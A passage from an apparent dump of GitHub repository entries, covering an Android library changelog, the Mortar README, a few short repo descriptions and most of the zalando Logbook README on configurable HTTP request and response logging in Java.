- fix: setHeaderCount caused display disorder
----------------------------- 1.5.0 (2019-6-17)----------------------------
- fix: data disorder after refresh with GridLayoutManager
----------------------------- 1.4.12 (2019-5-8)----------------------------
- fix: setDivideColor had no effect
----------------------------- 1.4.9 (2018-10-9)----------------------------
- fix: several issues caused by adding headers
----------------------------- 1.4.8 (2018-08-26)----------------------------
- provided a workaround for click-through on the sticky header bar
----------------------------- 1.4.7 (2018-08-16)----------------------------
- fix: layout not refreshed after data changed
----------------------------- 1.4.6 (2018-07-29)----------------------------
- changed the caching approach
- added performance checks
----------------------------- 1.4.5 (2018-06-17)----------------------------
- fixed layout disorder caused by using setHeaderCount with GridLayoutManager
----------------------------- 1.4.4 (2018-06-2)----------------------------
- added the setHeaderCount method
- updated the README
- bug fixes
----------------------------- 1.4.3 (2018-05-27)----------------------------
- fixed some bugs and renamed some APIs
----------------------------- 1.4.2 (2018-04-2)----------------------------
- improved click events: clicks on views inside the sticky header can now be received (View.NO_ID is returned when no id is set)
- fixed a crash or extra sticky item when load-more returns null (for the load-more-as-an-item approach)
----------------------------- 1.4.1 (2018-03-21)----------------------------
- caching is now disabled by default, to avoid display problems when data changes
- added the clearCache method for clearing the cache
----------------------------- 1.4.0 (2018-03-04)----------------------------
- support redrawing after asynchronous loading (e.g. network images)
- optimized caching
- improved dividers for GridLayoutManager
----------------------------- 1.3.1 (2018-01-30)----------------------------
- changed the measurement approach
----------------------------- 1.3.0 (2018-01-28)----------------------------
- removed the isAlignLeft() method; when right alignment is needed, just handle it in the layout.
- improved the caching mechanism.
"
square/mortar,master,2159,159,2013-11-09T00:01:50Z,884,33,"A simple library that makes it easy to pair thin views with dedicated controllers, isolated from most of the vagaries of the Activity life cycle.",,"# Mortar
## Deprecated
Mortar had a good run and served us well, but new use is strongly discouraged. The app suite at Square that drove its creation is in the process of replacing Mortar with [Square Workflow](https://square.github.io/workflow/).
## What's a Mortar?
Mortar provides a simplified, composable overlay for the Android lifecycle,
to aid in the use of [Views as the modular unit of Android applications][rant].
It leverages [Context#getSystemService][services] to act as an a la carte supplier
of services like dependency injection, bundle persistence, and whatever else
your app needs to provide itself.
One of the most useful services Mortar can provide is its [BundleService][bundle-service],
which gives any View (or any object with access to the Activity context) safe access to
the Activity lifecycle's persistence bundle. For fans of the [Model View Presenter][mvp]
pattern, we provide a persisted [Presenter][presenter] class that builds on BundleService.
Presenters are completely isolated from View concerns. They're particularly good at
surviving configuration changes, weathering the storm as Android destroys your portrait
Activity and Views and replaces them with landscape doppelgangers.
Mortar can similarly make [Dagger][dagger] ObjectGraphs (or [Dagger2][dagger2]
Components) visible as system services. Or not — these services are
completely decoupled.
Everything is managed by [MortarScope][scope] singletons, typically
backing the top level Application and Activity contexts. You can also spawn
your own shorter lived scopes to manage transient sessions, like the state of
an object being built by a set of wizard screens.
These nested scopes can shadow the services provided by higher level scopes.
For example, a [Dagger extension graph][ogplus] specific to your wizard session
can cover the one normally available, transparently to the wizard Views.
Calls like `ObjectGraphService.inject(getContext(), this)` are now possible
without considering which graph will do the injection.
## The Big Picture
An application will typically have a singleton MortarScope instance.
Its job is to serve as a delegate to the app's `getSystemService` method, something like:
```java
public class MyApplication extends Application {
private MortarScope rootScope;
@Override public Object getSystemService(String name) {
if (rootScope == null) rootScope = MortarScope.buildRootScope().build(getScopeName());
return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name);
}
}
```
This exposes a single, core service, the scope itself. From the scope you can
spawn child scopes, and you can register objects that implement the
[Scoped](https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Scoped.java#L18)
interface with it for setup and tear-down calls.
* `Scoped#onEnterScope(MortarScope)`
* `Scoped#onExitScope(MortarScope)`
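For example, a minimal sketch of an object that receives those calls, mirroring the two callbacks exactly as listed above (the class name is made up, and the `register` call is an assumption about how objects are signed up with a scope):
```java
public class SessionTracker implements Scoped {
  @Override public void onEnterScope(MortarScope scope) {
    // set-up: the scope this object was registered with is now active
  }
  @Override public void onExitScope(MortarScope scope) {
    // tear-down: the scope is going away, release anything held here
  }
}
// somewhere with access to a live scope:
rootScope.register(new SessionTracker());
```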
To make a scope provide other services, like a [Dagger ObjectGraph][og],
you register them while building the scope. That would make our Application's
`getSystemService` method look like this:
```java
@Override public Object getSystemService(String name) {
if (rootScope == null) {
rootScope = MortarScope.buildRootScope()
.with(ObjectGraphService.SERVICE_NAME, ObjectGraph.create(new RootModule()))
.build(getScopeName());
}
return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name);
}
```
Now any part of our app that has access to a `Context` can inject itself:
```java
public class MyView extends LinearLayout {
@Inject SomeService service;
public MyView(Context context, AttributeSet attrs) {
super(context, attrs);
ObjectGraphService.inject(context, this);
}
}
```
To take advantage of the BundleService described above, you'll put similar code
into your Activity. If it doesn't exist already, you'll
build a sub-scope to back the Activity's `getSystemService` method, and
while building it set up the `BundleServiceRunner`. You'll also notify
the BundleServiceRunner each time `onCreate` and `onSaveInstanceState` are
called, to make the persistence bundle available to the rest of the app.
```java
public class MyActivity extends Activity {
private MortarScope activityScope;
@Override public Object getSystemService(String name) {
MortarScope activityScope = MortarScope.findChild(getApplicationContext(), getScopeName());
if (activityScope == null) {
activityScope = MortarScope.buildChild(getApplicationContext()) //
.withService(BundleServiceRunner.SERVICE_NAME, new BundleServiceRunner())
.withService(HelloPresenter.class.getName(), new HelloPresenter())
.build(getScopeName());
}
return activityScope.hasService(name) ? activityScope.getService(name)
: super.getSystemService(name);
}
@Override protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
BundleServiceRunner.getBundleServiceRunner(this).onCreate(savedInstanceState);
setContentView(R.layout.main_view);
}
@Override protected void onSaveInstanceState(Bundle outState) {
super.onSaveInstanceState(outState);
BundleServiceRunner.getBundleServiceRunner(this).onSaveInstanceState(outState);
}
}
```
With that in place, any object in your app can sign up with the `BundleService`
to save and restore its state. This is nice for views, since Bundles are less
of a hassle than the `Parcelable` objects required by `View#onSaveInstanceState`,
and a boon to any business objects in the rest of your app.
Download
--------
Download [the latest JAR][jar] or grab via Maven:
```xml
<dependency>
  <groupId>com.squareup.mortar</groupId>
  <artifactId>mortar</artifactId>
  <version>(insert latest version)</version>
</dependency>
```
Gradle:
```groovy
compile 'com.squareup.mortar:mortar:(latest version)'
```
## Full Disclosure
This stuff has been in ""rapid"" development over a pretty long gestation period,
but is finally stabilizing. We don't expect drastic changes before cutting a
1.0 release, but we still cannot promise a stable API from release to release.
Mortar is a key component of multiple Square apps, including our flagship
[Square Register][register] app.
License
--------
Copyright 2013 Square, Inc.
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
[bundle-service]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/bundler/BundleService.java
[mvp]: http://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93presenter
[dagger]: http://square.github.io/dagger/
[dagger2]: http://google.github.io/dagger/
[jar]: http://repository.sonatype.org/service/local/artifact/maven/redirect?r=central-proxy&g=com.squareup.mortar&a=mortar&v=LATEST
[og]: https://square.github.io/dagger/1.x/dagger/dagger/ObjectGraph.html
[ogplus]: https://github.com/square/dagger/blob/dagger-parent-1.1.0/core/src/main/java/dagger/ObjectGraph.java#L96
[presenter]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Presenter.java
[rant]: http://corner.squareup.com/2014/10/advocating-against-android-fragments.html
[register]: https://play.google.com/store/apps/details?id=com.squareup
[scope]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/MortarScope.java
[services]: http://developer.android.com/reference/android/content/Context.html#getSystemService(java.lang.String)
"
joyoyao/superCleanMaster,master,1898,884,2015-02-12T03:37:41Z,12302,18,[DEPRECATED] ,,"# superCleanMaster
superCleanMaster is deprecated. Thanks for all your support!
"
frogermcs/GithubClient,master,1204,221,2015-05-27T16:43:03Z,190,17,Example of Github API client implemented on top of Dagger 2 DI framework. ,,"# GithubClient
Example of Github API client implemented on top of Dagger 2 DI framework.
This code was created as an example for Dependency Injection with Dagger 2 series on my dev-blog:
- [Introdution to Dependency Injection](http://frogermcs.github.io/dependency-injection-with-dagger-2-introdution-to-di/)
- [Dagger 2 API](http://frogermcs.github.io/dependency-injection-with-dagger-2-the-api/)
- [Dagger 2 - custom scopes](http://frogermcs.github.io/dependency-injection-with-dagger-2-custom-scopes/)
- [Dagger 2 - graph creation performance](http://frogermcs.github.io/dagger-graph-creation-performance/)
- [Dependency injection with Dagger 2 - Producers](http://frogermcs.github.io/dependency-injection-with-dagger-2-producers/)
- [Inject everything - ViewHolder and Dagger 2 (with Multibinding and AutoFactory example)](http://frogermcs.github.io/inject-everything-viewholder-and-dagger-2-example/)
This code was originally prepared for my presentation at Google I/O Extended 2015 in Tech Space Cracow. http://www.meetup.com/GDG-Krakow/events/221822600/
"
sirthias/pegdown,master,1285,218,2010-04-30T11:44:16Z,11716,84,A pure-Java Markdown processor based on a parboiled PEG parser supporting a number of extensions,,
zalando/logbook,main,1707,258,2015-09-14T15:29:12Z,6267,30,An extensible Java library for HTTP request and response logging,client-side http-logs java logbook logger logging logs monitoring observability plugin-extension request-response server-side spring-boot spring-boot-starter,"# Logbook: HTTP request and response logging
[![Logbook](docs/logbook.jpg)](#attributions)
[![Stability: Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html)
![Build Status](https://github.com/zalando/logbook/workflows/build/badge.svg)
[![Coverage Status](https://img.shields.io/coveralls/zalando/logbook/main.svg)](https://coveralls.io/r/zalando/logbook)
[![Javadoc](http://javadoc.io/badge/org.zalando/logbook-core.svg)](http://www.javadoc.io/doc/org.zalando/logbook-core)
[![Release](https://img.shields.io/github/release/zalando/logbook.svg)](https://github.com/zalando/logbook/releases)
[![Maven Central](https://img.shields.io/maven-central/v/org.zalando/logbook-parent.svg)](https://maven-badges.herokuapp.com/maven-central/org.zalando/logbook-parent)
[![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/zalando/logbook/main/LICENSE)
[![Project Map](https://sourcespy.com/shield.svg)](https://sourcespy.com/github/zalandologbook/)
> **Logbook** noun, /lɑɡ bʊk/: A book in which measurements from the ship's log are recorded, along with other salient details of the voyage.
**Logbook** is an extensible Java library to enable complete request and response logging for different client- and server-side technologies. It satisfies a special need by a) allowing web application
developers to log any HTTP traffic that an application receives or sends b) in a way that makes it easy to persist and analyze it later. This can be useful for traditional log analysis, meeting audit
requirements or investigating individual historic traffic issues.
Logbook is ready to use out of the box for most common setups. Even for uncommon applications and technologies, it should be simple to implement the necessary interfaces to connect a
library/framework/etc. to it.
## Features
- **Logging**: of HTTP requests and responses, including the body; partial logging (no body) for unauthorized requests
- **Customization**: of the logging format, the logging destination, and the conditions that determine which requests to log
- **Support**: for Servlet containers, Apache’s HTTP client, Square's OkHttp, and (via its elegant API) other frameworks
- Optional obfuscation of sensitive data
- [Spring Boot](http://projects.spring.io/spring-boot/) Auto Configuration
- [Scalyr](docs/scalyr.md) compatible
- Sensible defaults
## Dependencies
- Java 8 (for Spring 6 / Spring Boot 3 and JAX-RS 3.x, Java 17 is required)
- Any build tool using Maven Central, or direct download
- Servlet Container (optional)
- Apache HTTP Client 4.x **or 5.x** (optional)
- JAX-RS 3.x (aka Jakarta RESTful Web Services) Client and Server (optional)
- JAX-RS 2.x Client and Server (optional)
- Netty 4.x (optional)
- OkHttp 2.x **or 3.x** (optional)
- Spring **6.x** or Spring 5.x (optional, see instructions below)
- Spring Boot **3.x** or 2.x (optional)
- Ktor (optional)
- logstash-logback-encoder 5.x (optional)
## Installation
Add the following dependency to your project:
```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-core</artifactId>
    <version>${logbook.version}</version>
</dependency>
```
### Spring 5 / Spring Boot 2 Support
For Spring 5 / Spring Boot 2 backwards compatibility please add the following import:
```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-servlet</artifactId>
    <version>${logbook.version}</version>
    <classifier>javax</classifier>
</dependency>
```
Additional modules/artifacts of Logbook always share the same version number.
Alternatively, you can import our *bill of materials*...
```xml
<dependencyManagement>
    <dependencies>
        <dependency>
            <groupId>org.zalando</groupId>
            <artifactId>logbook-bom</artifactId>
            <version>${logbook.version}</version>
            <type>pom</type>
            <scope>import</scope>
        </dependency>
    </dependencies>
</dependencyManagement>
```
... which allows you to omit versions:
```xml
<dependency><groupId>org.zalando</groupId><artifactId>logbook-core</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-httpclient</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-jaxrs</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-json</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-netty</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-okhttp</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-okhttp2</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-servlet</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-spring-boot-starter</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-ktor-common</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-ktor-client</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-ktor-server</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-ktor</artifactId></dependency>
<dependency><groupId>org.zalando</groupId><artifactId>logbook-logstash</artifactId></dependency>
```
The logbook logger must be configured to trace level in order to log the requests and responses. With Spring Boot 2 (using Logback) this can be accomplished by adding the following line to your `application.properties`
```
logging.level.org.zalando.logbook: TRACE
```
## Usage
All integrations require an instance of `Logbook` which holds all configuration and wires all necessary parts together.
You can either create one using all the defaults:
```java
Logbook logbook = Logbook.create();
```
or create a customized version using the `LogbookBuilder`:
```java
Logbook logbook = Logbook.builder()
.condition(new CustomCondition())
.queryFilter(new CustomQueryFilter())
.pathFilter(new CustomPathFilter())
.headerFilter(new CustomHeaderFilter())
.bodyFilter(new CustomBodyFilter())
.requestFilter(new CustomRequestFilter())
.responseFilter(new CustomResponseFilter())
.sink(new DefaultSink(
new CustomHttpLogFormatter(),
new CustomHttpLogWriter()
))
.build();
```
### Strategy
Logbook used to have a very rigid strategy for how to do request/response logging:
- Requests/responses are logged separately
- Requests/responses are logged as soon as possible
- Requests/responses are logged as a pair or not logged at all
(i.e. no partial logging of traffic)
Some of those restrictions could be mitigated with custom [`HttpLogWriter`](#writing)
implementations, but they were never ideal.
Starting with version 2.0 Logbook now comes with a [Strategy pattern](https://en.wikipedia.org/wiki/Strategy_pattern)
at its core. Make sure you read the documentation of the [`Strategy`](logbook-api/src/main/java/org/zalando/logbook/Strategy.java)
interface to understand the implications.
Logbook comes with some built-in strategies:
- [`BodyOnlyIfStatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/BodyOnlyIfStatusAtLeastStrategy.java)
- [`StatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/StatusAtLeastStrategy.java)
- [`WithoutBodyStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/WithoutBodyStrategy.java)
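A strategy is plugged in via the builder; for example, a minimal sketch using one of the built-ins listed above (the constructor argument is an assumption):
```java
Logbook logbook = Logbook.builder()
    .strategy(new StatusAtLeastStrategy(400)) // only log exchanges with a status of 400 or higher
    .build();
```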
### Attribute Extractor
Starting with version 3.4.0, Logbook is equipped with a feature called *Attribute Extractor*. Attributes are basically a
list of key/value pairs that can be extracted from request and/or response, and logged with them. The idea was sprouted
from [issue 381](https://github.com/zalando/logbook/issues/381), where a feature was requested to extract the subject
claim from JWT tokens in the authorization header.
The `AttributeExtractor` interface has two `extract` methods: one that can extract attributes from the request only, and
one that has both the request and the response at its disposal. Both return an instance of the `HttpAttributes` class, which is
basically a fancy `Map<String, Object>`. Notice that since the map values are of type `Object`, they should have a
proper `toString()` method in order for them to appear in the logs in a meaningful way. Alternatively, log formatters
can work around this by implementing their own serialization logic. For instance, the built-in log formatter
`JsonHttpLogFormatter` uses `ObjectMapper` to serialize the values.
Here is an example:
```java
final class OriginExtractor implements AttributeExtractor {
@Override
public HttpAttributes extract(final HttpRequest request) {
return HttpAttributes.of(""origin"", request.getOrigin());
}
}
```
Logbook must then be created by registering this attribute extractor:
```java
final Logbook logbook = Logbook.builder()
.attributeExtractor(new OriginExtractor())
.build();
```
This will result in request logs to include something like:
```text
""attributes"":{""origin"":""LOCAL""}
```
For more advanced examples, look at the `JwtFirstMatchingClaimExtractor` and `JwtAllMatchingClaimsExtractor` classes.
The former extracts the first claim matching a list of claim names from the request JWT token.
The latter extracts all claims matching a list of claim names from the request JWT token.
If you require to incorporate multiple `AttributeExtractor`s, you can use the class `CompositeAttributeExtractor`:
```java
final List<AttributeExtractor> extractors = List.of(
extractor1,
extractor2,
extractor3
);
final Logbook logbook = Logbook.builder()
.attributeExtractor(new CompositeAttributeExtractor(extractors))
.build();
```
### Phases
Logbook works in several different phases:
1. [Conditional](#conditional),
2. [Filtering](#filtering),
3. [Formatting](#formatting) and
4. [Writing](#writing)
Each phase is represented by one or more interfaces that can be used for customization. Every phase has a sensible default.
#### Conditional
Logging HTTP messages and including their bodies is a rather expensive task, so it makes a lot of sense to disable logging for certain requests. A common use case would be to ignore *health check*
requests from a load balancer, or any request to management endpoints typically issued by developers.
Defining a condition is as easy as writing a special `Predicate` that decides whether a request (and its corresponding response) should be logged or not. Alternatively you can use and combine
predefined predicates:
```java
Logbook logbook = Logbook.builder()
.condition(exclude(
requestTo(""/health""),
requestTo(""/admin/**""),
contentType(""application/octet-stream""),
header(""X-Secret"", newHashSet(""1"", ""true"")::contains)))
.build();
```
Exclusion patterns, e.g. `/admin/**`, are loosely following [Ant's style of path patterns](https://ant.apache.org/manual/dirtasks.html#patterns)
without taking the query string of the URL into consideration.
#### Filtering
The goal of *Filtering* is to prevent the logging of certain sensitive parts of HTTP requests and responses. This
usually includes the *Authorization* header, but could also apply to certain plaintext query or form parameters —
e.g. *password*.
Logbook supports different types of filters:
| Type | Operates on | Applies to | Default |
|------------------|--------------------------------|------------|-----------------------------------------------------------------------------------|
| `QueryFilter` | Query string | request | `access_token` |
| `PathFilter` | Path | request | n/a |
| `HeaderFilter` | Header (single key-value pair) | both | `Authorization` |
| `BodyFilter` | Content-Type and body | both | json: `access_token` and `refresh_token` form: `client_secret` and `password` |
| `RequestFilter` | `HttpRequest` | request | Replace binary, multipart and stream bodies. |
| `ResponseFilter` | `HttpResponse` | response | Replace binary, multipart and stream bodies. |
`QueryFilter`, `PathFilter`, `HeaderFilter` and `BodyFilter` are relatively high-level and should cover all needs in ~90% of all
cases. For more complicated setups one should fallback to the low-level variants, i.e. `RequestFilter` and `ResponseFilter`
respectively (in conjunction with `ForwardingHttpRequest`/`ForwardingHttpResponse`).
You can configure filters like this:
```java
import static org.zalando.logbook.core.HeaderFilters.authorization;
import static org.zalando.logbook.core.HeaderFilters.eachHeader;
import static org.zalando.logbook.core.QueryFilters.accessToken;
import static org.zalando.logbook.core.QueryFilters.replaceQuery;
Logbook logbook = Logbook.builder()
.requestFilter(RequestFilters.replaceBody(message -> contentType(""audio/*"").test(message) ? ""mmh mmh mmh mmh"" : null))
.responseFilter(ResponseFilters.replaceBody(message -> contentType(""*/*-stream"").test(message) ? ""It just keeps going and going..."" : null))
.queryFilter(accessToken())
.queryFilter(replaceQuery(""password"", """"))
.headerFilter(authorization())
.headerFilter(eachHeader(""X-Secret""::equalsIgnoreCase, """"))
.build();
```
You can configure as many filters as you want - they will run consecutively.
##### JsonPath body filtering (experimental)
You can apply [JSON Path](https://github.com/json-path/JsonPath) filtering to JSON bodies.
Here are some examples:
```java
import static org.zalando.logbook.json.JsonPathBodyFilters.jsonPath;
import static java.util.regex.Pattern.compile;
Logbook logbook = Logbook.builder()
.bodyFilter(jsonPath(""$.password"").delete())
.bodyFilter(jsonPath(""$.active"").replace(""unknown""))
.bodyFilter(jsonPath(""$.address"").replace(""X""))
.bodyFilter(jsonPath(""$.name"").replace(compile(""^(\\w).+""), ""$1.""))
.bodyFilter(jsonPath(""$.friends.*.name"").replace(compile(""^(\\w).+""), ""$1.""))
.bodyFilter(jsonPath(""$.grades.*"").replace(1.0))
.build();
```
Take a look at the following example, before and after filtering was applied:
Before
```json
{
""id"": 1,
""name"": ""Alice"",
""password"": ""s3cr3t"",
""active"": true,
""address"": ""Anhalter Straße 17 13, 67278 Bockenheim an der Weinstraße"",
""friends"": [
{
""id"": 2,
""name"": ""Bob""
},
{
""id"": 3,
""name"": ""Charlie""
}
],
""grades"": {
""Math"": 1.0,
""English"": 2.2,
""Science"": 1.9,
""PE"": 4.0
}
}
```
After
```json
{
""id"": 1,
""name"": ""Alice"",
""active"": ""unknown"",
""address"": ""XXX"",
""friends"": [
{
""id"": 2,
""name"": ""B.""
},
{
""id"": 3,
""name"": ""C.""
}
],
""grades"": {
""Math"": 1.0,
""English"": 1.0,
""Science"": 1.0,
""PE"": 1.0
}
}
```
#### Correlation
Logbook uses a *correlation id* to correlate requests and responses. This allows matching related requests and responses that would usually be located in different places in the log file.
If the default implementation of the correlation id is insufficient for your use case, you may provide a custom implementation:
```java
Logbook logbook = Logbook.builder()
.correlationId(new CustomCorrelationId())
.build();
```
#### Formatting
*Formatting* defines how requests and responses will be transformed to strings basically. Formatters do **not** specify where requests and responses are logged to — writers do that work.
Logbook comes with two different default formatters: *HTTP* and *JSON*.
##### HTTP
*HTTP* is the default formatting style, provided by the `DefaultHttpLogFormatter`. It is primarily designed to be used for local development and debugging, not for production use. This is because it’s
not as readily machine-readable as JSON.
###### Request
```http
Incoming Request: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b
GET http://example.org/test HTTP/1.1
Accept: application/json
Host: localhost
Content-Type: text/plain
Hello world!
```
###### Response
```http
Outgoing Response: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b
Duration: 25 ms
HTTP/1.1 200
Content-Type: application/json
{""value"":""Hello world!""}
```
##### JSON
*JSON* is an alternative formatting style, provided by the `JsonHttpLogFormatter`. Unlike HTTP, it is primarily designed for production use — parsers and log consumers can easily consume it.
Requires the following dependency:
```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-json</artifactId>
</dependency>
```
###### Request
```json
{
""origin"": ""remote"",
""type"": ""request"",
""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"",
""protocol"": ""HTTP/1.1"",
""sender"": ""127.0.0.1"",
""method"": ""GET"",
""uri"": ""http://example.org/test"",
""host"": ""example.org"",
""path"": ""/test"",
""scheme"": ""http"",
""port"": null,
""headers"": {
""Accept"": [""application/json""],
""Content-Type"": [""text/plain""]
},
""body"": ""Hello world!""
}
```
###### Response
```json
{
""origin"": ""local"",
""type"": ""response"",
""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"",
""duration"": 25,
""protocol"": ""HTTP/1.1"",
""status"": 200,
""headers"": {
""Content-Type"": [""text/plain""]
},
""body"": ""Hello world!""
}
```
Note: Bodies of type `application/json` (and `application/*+json`) will be *inlined* into the resulting JSON tree. I.e.,
a JSON response body will **not** be escaped and represented as a string:
```json
{
""origin"": ""local"",
""type"": ""response"",
""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"",
""duration"": 25,
""protocol"": ""HTTP/1.1"",
""status"": 200,
""headers"": {
""Content-Type"": [""application/json""]
},
""body"": {
""greeting"": ""Hello, world!""
}
}
```
##### Common Log Format
The Common Log Format ([CLF](https://httpd.apache.org/docs/trunk/logs.html#common)) is a standardized text file format used by web servers when generating server log files. The format is supported via
the `CommonsLogFormatSink`:
```text
185.85.220.253 - - [02/Aug/2019:08:16:41 0000] ""GET /search?q=zalando HTTP/1.1"" 200 -
```
##### Extended Log Format
The Extended Log Format ([ELF](https://en.wikipedia.org/wiki/Extended_Log_Format)) is a standardised text file format, like Common Log Format (CLF), that is used by web servers when generating log
files, but ELF files provide more information and flexibility. The format is supported via the `ExtendedLogFormatSink`.
Also see [W3C](https://www.w3.org/TR/WD-logfile.html) document.
Default fields:
```text
date time c-ip s-dns cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-bytes time-taken cs-protocol cs(User-Agent) cs(Cookie) cs(Referrer)
```
Default log output example:
```text
2019-08-02 08:16:41 185.85.220.253 localhost POST /search ?q=zalando 200 21 20 0.125 HTTP/1.1 ""Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"" ""name=value"" ""https://example.com/page?q=123""
```
Users may override default fields with their custom fields through the constructor of `ExtendedLogFormatSink`:
```java
new ExtendedLogFormatSink(new DefaultHttpLogWriter(),""date time cs(Custom-Request-Header) sc(Custom-Response-Header)"")
```
For Http header fields: `cs(Any-Header)` and `sc(Any-Header)`, users could specify any headers they want to extract from the request.
Other supported fields are listed in the value of `ExtendedLogFormatSink.Field`, which can be put in the custom field expression.
##### cURL
*cURL* is an alternative formatting style, provided by the `CurlHttpLogFormatter` which will render requests as
executable [`cURL`](https://curl.haxx.se/) commands. Unlike JSON, it is primarily designed for humans.
###### Request
```bash
curl -v -X GET 'http://localhost/test' -H 'Accept: application/json'
```
###### Response
See [HTTP](#http) or provide own fallback for responses:
```java
new CurlHttpLogFormatter(new JsonHttpLogFormatter());
```
##### Splunk
*Splunk* is an alternative formatting style, provided by the `SplunkHttpLogFormatter` which will render
requests and response as key-value pairs.
###### Request
```text
origin=remote type=request correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b protocol=HTTP/1.1 sender=127.0.0.1 method=POST uri=http://example.org/test host=example.org scheme=http port=null path=/test headers={Accept=[application/json], Content-Type=[text/plain]} body=Hello world!
```
###### Response
```text
origin=local type=response correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b duration=25 protocol=HTTP/1.1 status=200 headers={Content-Type=[text/plain]} body=Hello world!
```
#### Writing
Writing defines where formatted requests and responses are written to. Logbook comes with three implementations:
Logger, Stream and Chunking.
##### Logger
By default, requests and responses are logged with an *slf4j* logger that uses the `org.zalando.logbook.Logbook`
category and the log level `trace`. This can be customized:
```java
Logbook logbook = Logbook.builder()
.sink(new DefaultSink(
new DefaultHttpLogFormatter(),
new DefaultHttpLogWriter()
))
.build();
```
##### Stream
An alternative implementation is to log requests and responses to a `PrintStream`, e.g. `System.out` or `System.err`. This is usually a bad choice for running in production, but can sometimes be
useful for short-term local development and/or investigation.
```java
Logbook logbook = Logbook.builder()
.sink(new DefaultSink(
new DefaultHttpLogFormatter(),
new StreamHttpLogWriter(System.err)
))
.build();
```
##### Chunking
The `ChunkingSink` will split long messages into smaller chunks and will write them individually while delegating to another sink:
```java
Logbook logbook = Logbook.builder()
.sink(new ChunkingSink(sink, 1000))
.build();
```
#### Sink
The combination of `HttpLogFormatter` and `HttpLogWriter` suits most use cases well, but it has limitations.
Implementing the `Sink` interface directly allows for more sophisticated use cases, e.g. writing requests/responses
to a structured persistent storage like a database.
Multiple sinks can be combined into one using the `CompositeSink`.
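For illustration, a rough sketch of a custom `Sink` that writes to a database (the method signatures are an approximation of the interface and the persistence calls are left as comments):
```java
class DatabaseSink implements Sink {
    @Override
    public void write(final Precorrelation precorrelation, final HttpRequest request) throws IOException {
        // persist the request, keyed by precorrelation.getId()
    }
    @Override
    public void write(final Correlation correlation, final HttpRequest request, final HttpResponse response) throws IOException {
        // persist the response next to its request, keyed by correlation.getId()
    }
}
```
It can then be registered via `Logbook.builder().sink(new DatabaseSink()).build()`, or combined with other sinks using the `CompositeSink` mentioned above.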
### Servlet
You’ll have to register the `LogbookFilter` as a `Filter` in your filter chain — either in your `web.xml` file (please note that the xml approach will use all the defaults and is not configurable):
```xml
<filter>
    <filter-name>LogbookFilter</filter-name>
    <filter-class>org.zalando.logbook.servlet.LogbookFilter</filter-class>
</filter>
<filter-mapping>
    <filter-name>LogbookFilter</filter-name>
    <url-pattern>/*</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>ASYNC</dispatcher>
</filter-mapping>
```
or programmatically, via the `ServletContext`:
```java
context.addFilter(""LogbookFilter"", new LogbookFilter(logbook))
.addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*"");
```
**Beware**: The `ERROR` dispatch is not supported. You're strongly advised to produce error responses within the
`REQUEST` or `ASYNC` dispatch.
The `LogbookFilter` will, by default, treat requests with an `application/x-www-form-urlencoded` body no differently from
any other request, i.e. you will see the request body in the logs. The downside of this approach is that you won't be
able to use any of the `HttpServletRequest.getParameter*(..)` methods. See issue [#94](../../issues/94) for some more
details.
#### Form Requests
As of Logbook 1.5.0, you can now specify one of three strategies that define how Logbook deals with this situation by
using the `logbook.servlet.form-request` system property:
| Value | Pros | Cons |
|------------------|-----------------------------------------------------------------------------------|----------------------------------------------------|
| `body` (default) | Body is logged | Downstream code can **not use `getParameter*()`** |
| `parameter` | Body is logged (but it's reconstructed from parameters) | Downstream code can **not use `getInputStream()`** |
| `off` | Downstream code can decide whether to use `getInputStream()` or `getParameter*()` | Body is **not logged** |
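For example, to switch to the `parameter` strategy you can set the system property before the filter handles any traffic; a minimal sketch (in practice this is usually passed as a `-D` argument to the JVM instead):
```java
System.setProperty(""logbook.servlet.form-request"", ""parameter"");
```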
#### Security
